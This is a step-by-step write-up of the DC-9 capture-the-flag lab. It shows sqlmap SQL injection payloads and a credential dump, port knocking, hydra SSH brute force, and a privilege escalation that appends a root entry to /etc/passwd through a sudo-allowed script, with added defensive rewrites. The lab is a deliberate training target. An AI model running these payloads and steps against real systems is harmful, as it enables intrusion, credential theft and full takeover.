Lluna's Pure land.


DC-9

0x00. Official description

DC-9 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

The ultimate goal of this challenge is to get root and to read the one and only flag.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won’t give you the answer, instead, I’ll give you an idea about how to move forward.

0x01. The usual nmap sweep

.1 is the gateway, .2 is the host machine and .6 is Kali, so .8 must be our target.

root@JIYE:~/vulnhub/dc9# nmap -sP 192.168.1.0/24 -oN nmap.sP
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-02 02:16 EDT
Nmap scan report for 192.168.1.1
Host is up (0.0026s latency).
MAC Address: 68:D1:BA:1F:FD:48 (Shenzhen Youhua Technology)
Nmap scan report for 192.168.1.2
Host is up (0.00032s latency).
MAC Address: 50:5B:C2:8C:BE:A5 (Liteon Technology)
Nmap scan report for 192.168.1.8
Host is up (0.00028s latency).
MAC Address: 00:0C:29:D7:7C:A8 (VMware)
Nmap scan report for 192.168.1.6
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.08 seconds
root@JIYE:~/vulnhub/dc9#

0x02. Continue with nmap to scan services and ports

Ports 22 and 80 show up; SSH is reported as filtered, so we guess that knockd is installed.

root@JIYE:~/vulnhub/dc9# nmap -sC -sV -v 192.168.1.8 -oN nmap.demo
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-02 02:17 EDT
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 02:17
Completed NSE at 02:17, 0.00s elapsed
Initiating NSE at 02:17
Completed NSE at 02:17, 0.00s elapsed
Initiating NSE at 02:17
Completed NSE at 02:17, 0.00s elapsed
Initiating ARP Ping Scan at 02:17
Scanning 192.168.1.8 [1 port]
Completed ARP Ping Scan at 02:17, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 02:17
Completed Parallel DNS resolution of 1 host. at 02:17, 0.03s elapsed
Initiating SYN Stealth Scan at 02:17
Scanning 192.168.1.8 [1000 ports]
Discovered open port 80/tcp on 192.168.1.8
Completed SYN Stealth Scan at 02:17, 0.06s elapsed (1000 total ports)
Initiating Service scan at 02:17
Scanning 1 service on 192.168.1.8
Completed Service scan at 02:17, 6.25s elapsed (1 service on 1 host)
NSE: Script scanning 192.168.1.8.
Initiating NSE at 02:17
Completed NSE at 02:17, 0.91s elapsed
Initiating NSE at 02:17
Completed NSE at 02:17, 0.00s elapsed
Initiating NSE at 02:17
Completed NSE at 02:17, 0.00s elapsed
Nmap scan report for 192.168.1.8
Host is up (0.00011s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp open http Apache httpd 2.4.38 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Example.com - Staff Details - Welcome
MAC Address: 00:0C:29:D7:7C:A8 (VMware)

NSE: Script Post-scanning.
Initiating NSE at 02:17
Completed NSE at 02:17, 0.00s elapsed
Initiating NSE at 02:17
Completed NSE at 02:17, 0.00s elapsed
Initiating NSE at 02:17
Completed NSE at 02:17, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.92 seconds
Raw packets sent: 1001 (44.028KB) | Rcvd: 1001 (40.064KB)
root@JIYE:~/vulnhub/dc9#

0x03. Port 80 is open, so visit it directly

The site shows a few users, a login form and a search form; nothing else useful.

0x04. Capture the request and scan for injection points

1. Capture the requests from both the search form and the login form

2. Save the request to a file

root@JIYE:~/vulnhub/dc9# cat demo.txt 
POST /results.php HTTP/1.1
Host: 192.168.1.8
Content-Length: 8
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36
Origin: http://192.168.1.8
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.8/search.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: SESS6ea13d7ee6970decd87c6ae82c8909ff=6hCT-InqREqWsLqJQMvcblMzdjfBuTsTvOqLVecWfjs; PHPSESSID=pdng34438k3h323o5l59vk46k4
Connection: close

search=1
root@JIYE:~/vulnhub/dc9#

3. Scan for injection points: the search parameter is injectable

root@JIYE:~/vulnhub/dc9# sqlmap -r demo.txt --dbs --batch
___
__H__
___ ___["]_____ ___ ___ {1.4.8#stable}
|_ -| . [,] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 02:55:09 /2020-09-02/

[02:55:09] [INFO] parsing HTTP request from 'demo.txt'
[02:55:10] [INFO] testing connection to the target URL
[02:55:10] [INFO] testing if the target URL content is stable
[02:55:10] [INFO] target URL content is stable
[02:55:10] [INFO] testing if POST parameter 'search' is dynamic
[02:55:10] [WARNING] POST parameter 'search' does not appear to be dynamic
[02:55:10] [WARNING] heuristic (basic) test shows that POST parameter 'search' might not be injectable
[02:55:10] [INFO] testing for SQL injection on POST parameter 'search'
[02:55:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[02:55:10] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[02:55:10] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:55:10] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[02:55:10] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[02:55:10] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[02:55:10] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[02:55:10] [INFO] testing 'Generic inline queries'
[02:55:10] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[02:55:10] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[02:55:10] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[02:55:10] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[02:55:31] [INFO] POST parameter 'search' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[02:55:31] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[02:55:31] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[02:55:31] [INFO] target URL appears to be UNION injectable with 6 columns
[02:55:31] [INFO] POST parameter 'search' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
POST parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 72 HTTP(s) requests:
---
Parameter: search (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=1' AND (SELECT 2109 FROM (SELECT(SLEEP(5)))ucaC) AND 'xHdu'='xHdu

Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170787171,0x765048726464796263436c4a6d764c4652704579707170484f6754656e7547764a50547565464e45,0x71767a7671),NULL,NULL-- -
---
[02:55:31] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[02:55:31] [INFO] fetching database names
available databases [3]:
[*] information_schema
[*] Staff
[*] users

[02:55:31] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.8'

[*] ending @ 02:55:31 /2020-09-02/

root@JIYE:~/vulnhub/dc9#

4. Query the current database: it is Staff

root@JIYE:~/vulnhub/dc9# sqlmap -r demo.txt --dbs --batch --current-db
___
__H__
___ ___[)]_____ ___ ___ {1.4.8#stable}
|_ -| . [,] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 02:57:16 /2020-09-02/

[02:57:16] [INFO] parsing HTTP request from 'demo.txt'
[02:57:16] [INFO] resuming back-end DBMS 'mysql'
[02:57:16] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=1' AND (SELECT 2109 FROM (SELECT(SLEEP(5)))ucaC) AND 'xHdu'='xHdu

Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170787171,0x765048726464796263436c4a6d764c4652704579707170484f6754656e7547764a50547565464e45,0x71767a7671),NULL,NULL-- -
---
[02:57:16] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[02:57:16] [INFO] fetching current database
current database: 'Staff'
[02:57:17] [INFO] fetching database names
available databases [3]:
[*] information_schema
[*] Staff
[*] users

[02:57:17] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.8'

[*] ending @ 02:57:17 /2020-09-02/

root@JIYE:~/vulnhub/dc9#

5. Enumerate the tables: Users

root@JIYE:~/vulnhub/dc9# sqlmap -r demo.txt -D Staff --tables --batch
___
__H__
___ ___[(]_____ ___ ___ {1.4.8#stable}
|_ -| . ["] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 02:59:07 /2020-09-02/

[02:59:07] [INFO] parsing HTTP request from 'demo.txt'
[02:59:07] [INFO] resuming back-end DBMS 'mysql'
[02:59:07] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=1' AND (SELECT 2109 FROM (SELECT(SLEEP(5)))ucaC) AND 'xHdu'='xHdu

Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170787171,0x765048726464796263436c4a6d764c4652704579707170484f6754656e7547764a50547565464e45,0x71767a7671),NULL,NULL-- -
---
[02:59:07] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[02:59:07] [INFO] fetching tables for database: 'Staff'
Database: Staff
[2 tables]
+--------------+
| StaffDetails |
| Users |
+--------------+

[02:59:07] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.8'

[*] ending @ 02:59:07 /2020-09-02/

root@JIYE:~/vulnhub/dc9#

6. Enumerate the columns

root@JIYE:~/vulnhub/dc9# sqlmap -r demo.txt -D Staff -T Users --column --batch
___
__H__
___ ___[,]_____ ___ ___ {1.4.8#stable}
|_ -| . ['] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 03:02:44 /2020-09-02/

[03:02:44] [INFO] parsing HTTP request from 'demo.txt'
[03:02:44] [INFO] resuming back-end DBMS 'mysql'
[03:02:44] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=1' AND (SELECT 2109 FROM (SELECT(SLEEP(5)))ucaC) AND 'xHdu'='xHdu

Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170787171,0x765048726464796263436c4a6d764c4652704579707170484f6754656e7547764a50547565464e45,0x71767a7671),NULL,NULL-- -
---
[03:02:44] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[03:02:44] [INFO] fetching columns for table 'Users' in database 'Staff'
Database: Staff
Table: Users
[3 columns]
+----------+-----------------+
| Column | Type |
+----------+-----------------+
| Password | varchar(255) |
| UserID | int(6) unsigned |
| Username | varchar(255) |
+----------+-----------------+

[03:02:44] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.8'

[*] ending @ 03:02:44 /2020-09-02/

root@JIYE:~/vulnhub/dc9#

7. Dump the data

This gives us admin and its password hash.

root@JIYE:~/vulnhub/dc9# sqlmap -r demo.txt -D Staff -T Users -C Username,Password --dump --batch
___
__H__
___ ___[,]_____ ___ ___ {1.4.8#stable}
|_ -| . ["] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 03:04:03 /2020-09-02/

[03:04:03] [INFO] parsing HTTP request from 'demo.txt'
[03:04:03] [INFO] resuming back-end DBMS 'mysql'
[03:04:03] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=1' AND (SELECT 2109 FROM (SELECT(SLEEP(5)))ucaC) AND 'xHdu'='xHdu

Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170787171,0x765048726464796263436c4a6d764c4652704579707170484f6754656e7547764a50547565464e45,0x71767a7671),NULL,NULL-- -
---
[03:04:03] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[03:04:03] [INFO] fetching entries of column(s) 'Password, Username' for table 'Users' in database 'Staff'
[03:04:03] [INFO] recognized possible password hashes in column 'Password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[03:04:03] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[03:04:03] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[03:04:03] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[03:04:03] [INFO] starting 4 processes
[03:04:15] [WARNING] no clear password(s) found
Database: Staff
Table: Users
[1 entry]
+----------+----------------------------------+
| Username | Password |
+----------+----------------------------------+
| admin | 856f5de590ef37314e7c3bdf6f8a66dc |
+----------+----------------------------------+

[03:04:15] [INFO] table 'Staff.Users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.1.8/dump/Staff/Users.csv'
[03:04:15] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.8'

[*] ending @ 03:04:15 /2020-09-02/

root@JIYE:~/vulnhub/dc9#

8. Other user information

The web interface showed user details earlier, and the enumeration also turned up a users database, so presumably the users database is where those user details are stored.

root@JIYE:~/vulnhub/dc9# sqlmap -r demo.txt -D users -T UserDetails -C username,password --dump --batch
___
__H__
___ ___[.]_____ ___ ___ {1.4.8#stable}
|_ -| . ["] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 03:12:26 /2020-09-02/

[03:12:26] [INFO] parsing HTTP request from 'demo.txt'
[03:12:26] [INFO] resuming back-end DBMS 'mysql'
[03:12:26] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=1' AND (SELECT 2109 FROM (SELECT(SLEEP(5)))ucaC) AND 'xHdu'='xHdu

Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170787171,0x765048726464796263436c4a6d764c4652704579707170484f6754656e7547764a50547565464e45,0x71767a7671),NULL,NULL-- -
---
[03:12:26] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[03:12:26] [INFO] fetching entries of column(s) 'password, username' for table 'UserDetails' in database 'users'
Database: users
Table: UserDetails
[17 entries]
+-----------+---------------+
| username | password |
+-----------+---------------+
| marym | 3kfs86sfd |
| julied | 468sfdfsd2 |
| fredf | 4sfd87sfd1 |
| barneyr | RocksOff |
| tomc | TC&TheBoyz |
| jerrym | B8m#48sd |
| wilmaf | Pebbles |
| bettyr | BamBam01 |
| chandlerb | UrAG0D! |
| joeyt | Passw0rd |
| rachelg | yN72#dsd |
| rossg | ILoveRachel |
| monicag | 3248dsds7s |
| phoebeb | smellycats |
| scoots | YR3BVxxxw87 |
| janitor | Ilovepeepee |
| janitor2 | Hawaii-Five-0 |
+-----------+---------------+

[03:12:26] [INFO] table 'users.UserDetails' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.1.8/dump/users/UserDetails.csv'
[03:12:26] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.8'

[*] ending @ 03:12:26 /2020-09-02/

root@JIYE:~/vulnhub/dc9#
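The post does not show the back-end query behind results.php, so the following added example (not the lab's code) reconstructs the situation in SQLite: a six-column StaffDetails table, since sqlmap reported the target UNION-injectable with 6 columns, queried once by string concatenation and once with a bound parameter. The post's UNION payload is reused with its CONCAT(hex) marker replaced by a plain string literal because older SQLite builds have no CONCAT(); the table layout and column names are assumptions.

```python
import sqlite3

# Constructed stand-in for DC-9's Staff.StaffDetails (assumed layout): six
# columns, matching the "UNION injectable with 6 columns" result from sqlmap.
SCHEMA = """
CREATE TABLE StaffDetails(
  id INTEGER, firstname TEXT, lastname TEXT, username TEXT, position TEXT, phone TEXT);
INSERT INTO StaffDetails VALUES
  (1, 'Mary', 'Moe', 'marym', 'Receptionist', '46478415155'),
  (2, 'Fred', 'Flintstone', 'fredf', 'Developer', '46478415158');
"""

# The UNION payload sqlmap used against the search form, with the CONCAT(...)
# marker replaced by a string literal so it runs on any SQLite version.
UNION_PAYLOAD = "1' UNION ALL SELECT NULL,NULL,NULL,'INJECTED',NULL,NULL-- -"


def make_db() -> sqlite3.Connection:
    """Create the in-memory sample database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def search_vulnerable(conn: sqlite3.Connection, term: str) -> list:
    """User input spliced into the SQL text: the payload's closing quote ends
    the string literal and everything after it becomes part of the query."""
    sql = f"SELECT * FROM StaffDetails WHERE lastname LIKE '{term}%'"
    return conn.execute(sql).fetchall()


def search_safe(conn: sqlite3.Connection, term: str) -> list:
    """Parameter binding: the driver passes the term as data, never as SQL,
    so the same payload is just an unusual (and unmatched) search string."""
    sql = "SELECT * FROM StaffDetails WHERE lastname LIKE ?"
    return conn.execute(sql, (term + "%",)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", search_vulnerable(db, UNION_PAYLOAD))  # one injected row
    print("safe:      ", search_safe(db, UNION_PAYLOAD))        # no rows
    print("normal:    ", search_safe(db, "Flint"))              # fredf's row
```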

0x05. Cracking

1. The admin hash cracks to transorbital1

0x06. Log in to the web application

A "file does not exist" message appears, which suggests a file inclusion.

Testing and brute-forcing the inclusion parameter are omitted here.

The users pulled from the database are able to log in.

However, knockd is filtering SSH, so read the knockd configuration file; after that, three users can log in.

Knock the ports with nmap

root@JIYE:~/vulnhub/dc9# for x in 7469 8475 9842; do nmap -Pn --max-retries 0 -p $x 192.168.1.8; done
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-02 03:52 EDT
Nmap scan report for 192.168.1.8
Host is up (0.00066s latency).

PORT STATE SERVICE
7469/tcp closed unknown
MAC Address: 00:0C:29:D7:7C:A8 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.20 seconds
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-02 03:52 EDT
Nmap scan report for 192.168.1.8
Host is up (0.00048s latency).

PORT STATE SERVICE
8475/tcp closed unknown
MAC Address: 00:0C:29:D7:7C:A8 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.19 seconds
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-02 03:52 EDT
Nmap scan report for 192.168.1.8
Host is up (0.00048s latency).

PORT STATE SERVICE
9842/tcp closed unknown
MAC Address: 00:0C:29:D7:7C:A8 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.18 seconds
root@JIYE:~/vulnhub/dc9#

0x07. Brute-force SSH

root@JIYE:~/vulnhub/dc9# hydra -L user.txt -P pass.txt 192.168.1.8 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-02 03:58:38
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 289 login tries (l:17/p:17), ~19 tries per task
[DATA] attacking ssh://192.168.1.8:22/
[22][ssh] host: 192.168.1.8 login: chandlerb password: UrAG0D!
[22][ssh] host: 192.168.1.8 login: joeyt password: Passw0rd
[22][ssh] host: 192.168.1.8 login: janitor password: Ilovepeepee
1 of 1 target successfully completed, 3 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-09-02 03:59:26
root@JIYE:~/vulnhub/dc9#

Log in over SSH. Only the janitor account has anything useful: a file with some passwords. sudo -l gives nothing.

janitor@dc-9:~$ ls -la
total 16
drwx------ 4 janitor janitor 4096 Sep 2 17:57 .
drwxr-xr-x 19 root root 4096 Dec 29 2019 ..
lrwxrwxrwx 1 janitor janitor 9 Dec 29 2019 .bash_history -> /dev/null
drwx------ 3 janitor janitor 4096 Sep 2 17:57 .gnupg
drwx------ 2 janitor janitor 4096 Dec 29 2019 .secrets-for-putin
janitor@dc-9:~$
janitor@dc-9:~$ cd .secrets-for-putin/
janitor@dc-9:~/.secrets-for-putin$ ls
passwords-found-on-post-it-notes.txt
janitor@dc-9:~/.secrets-for-putin$ cat passwords-found-on-post-it-notes.txt
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts
janitor@dc-9:~/.secrets-for-putin$

0x08. Brute-force SSH again

Rebuild the password list with the new entries

root@JIYE:~/vulnhub/dc9# cat pass.txt 
3kfs86sfd
468sfdfsd2
4sfd87sfd1
RocksOff
TC&TheBoyz
B8m#48sd
Pebbles
BamBam01
UrAG0D!
Passw0rd
yN72#dsd
ILoveRachel
3248dsds7s
smellycats
YR3BVxxxw87
Ilovepeepee
Hawaii-Five-0
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts
root@JIYE:~/vulnhub/dc9

Brute-force again and one more user turns up

root@JIYE:~/vulnhub/dc9# hydra -L user.txt -P pass.txt 192.168.1.8 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-02 04:13:22
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 391 login tries (l:17/p:23), ~25 tries per task
[DATA] attacking ssh://192.168.1.8:22/
[22][ssh] host: 192.168.1.8 login: fredf password: B4-Tru3-001
[22][ssh] host: 192.168.1.8 login: chandlerb password: UrAG0D!
[22][ssh] host: 192.168.1.8 login: joeyt password: Passw0rd
[22][ssh] host: 192.168.1.8 login: janitor password: Ilovepeepee
[STATUS] 368.00 tries/min, 368 tries in 00:01h, 25 to do in 00:01h, 16 active
1 of 1 target successfully completed, 4 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-09-02 04:14:40
root@JIYE:~/vulnhub/dc9#

0x09. Log in as fredf

fredf@dc-9:~$ sudo -l
Matching Defaults entries for fredf on dc-9:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User fredf may run the following commands on dc-9:
(root) NOPASSWD: /opt/devstuff/dist/test/test
fredf@dc-9:~$

0x10. Privilege escalation

Look at test

What this code does:

It takes two "arguments (files)": it opens the first file and reads its contents into output; then it opens the second file in append mode, writes output to it and closes it.

fredf@dc-9:/opt/devstuff$ cat test.py 
#!/usr/bin/python

import sys

if len (sys.argv) != 3 :
    print ("Usage: python test.py read append")
    sys.exit (1)

else :
    f = open(sys.argv[1], "r")
    output = (f.read())

    f = open(sys.argv[2], "a")
    f.write(output)
    f.close()
fredf@dc-9:/opt/devstuff$
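Run as root through sudo NOPASSWD, the script above is an arbitrary read plus arbitrary append. The following hardened rewrite is an added example, not part of the lab or the post: it confines both paths to one directory, refuses symlinks and caps the copy size before opening anything. ALLOWED_BASE is an assumed location, and demo() builds its own temporary files.

```python
#!/usr/bin/env python3
"""Hardened counterpart of DC-9's test.py (added example, not the lab's code)."""
import os
import sys
import tempfile

ALLOWED_BASE = "/opt/devstuff/data"   # assumed directory the tool may touch
MAX_BYTES = 1024 * 1024               # refuse to copy more than 1 MiB


def is_within(base: str, path: str) -> bool:
    """True if `path`, with symlinks and '..' resolved, lies under `base`."""
    base_real = os.path.realpath(base)
    path_real = os.path.realpath(path)
    return os.path.commonpath([base_real, path_real]) == base_real


def safe_append(src: str, dst: str, base: str = ALLOWED_BASE) -> int:
    """Append src to dst and return the byte count; raise ValueError if either
    path escapes `base`, is a symlink, or src exceeds MAX_BYTES. All checks run
    before any file is opened, so a rejected call has no side effects."""
    for label, path in (("source", src), ("destination", dst)):
        if not is_within(base, path):
            raise ValueError(f"{label} path {path!r} is outside {base!r}")
        if os.path.islink(path):
            raise ValueError(f"{label} path {path!r} is a symlink")
    if os.path.getsize(src) > MAX_BYTES:
        raise ValueError("source file too large")
    with open(src, "rb") as f:
        data = f.read(MAX_BYTES)
    # O_NOFOLLOW closes the race between the islink() check and the open.
    fd = os.open(dst, os.O_WRONLY | os.O_APPEND | os.O_CREAT | os.O_NOFOLLOW, 0o640)
    with os.fdopen(fd, "ab") as out:
        out.write(data)
    return len(data)


def demo() -> dict:
    """Constructed run: one legitimate append, then the /etc/passwd attempt."""
    with tempfile.TemporaryDirectory() as base:
        src = os.path.join(base, "note.txt")
        dst = os.path.join(base, "log.txt")
        with open(src, "w") as f:
            f.write("hello\n")
        copied = safe_append(src, dst, base=base)
        with open(dst) as f:
            content = f.read()
        try:
            safe_append(src, "/etc/passwd", base=base)
            blocked = False
        except ValueError:
            blocked = True
    return {"copied": copied, "content": content, "blocked": blocked}


if __name__ == "__main__":
    if len(sys.argv) != 3:
        print("Usage: test.py read append")
        sys.exit(1)
    try:
        print(f"appended {safe_append(sys.argv[1], sys.argv[2])} bytes")
    except (ValueError, OSError) as exc:
        print(f"refused: {exc}")
        sys.exit(1)
```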

Given that, we can append a line to /etc/passwd.

Since the second field of /etc/passwd is the password field, first generate a password hash

root@JIYE:~# openssl passwd -1 -salt demo 123
$1$demo$N8rNOM51XVLc6Sj7cqsmT/
root@JIYE:~#
Write the passwd entry
fredf@dc-9:~$ echo 'demo:$1$demo$N8rNOM51XVLc6Sj7cqsmT/:0:0::/root:/bin/bash' > /tmp/demo

Run it

fredf@dc-9:/opt/devstuff/dist/test$ sudo ./test /tmp/demo /etc/passwd
fredf@dc-9:/opt/devstuff/dist/test$ su demo
Password:
root@dc-9:/opt/devstuff/dist/test# cd
root@dc-9:~# ls
theflag.txt
root@dc-9:~# cat theflag.txt


███╗ ██╗██╗ ██████╗███████╗ ██╗ ██╗ ██████╗ ██████╗ ██╗ ██╗██╗██╗██╗
████╗ ██║██║██╔════╝██╔════╝ ██║ ██║██╔═══██╗██╔══██╗██║ ██╔╝██║██║██║
██╔██╗ ██║██║██║ █████╗ ██║ █╗ ██║██║ ██║██████╔╝█████╔╝ ██║██║██║
██║╚██╗██║██║██║ ██╔══╝ ██║███╗██║██║ ██║██╔══██╗██╔═██╗ ╚═╝╚═╝╚═╝
██║ ╚████║██║╚██████╗███████╗ ╚███╔███╔╝╚██████╔╝██║ ██║██║ ██╗██╗██╗██╗
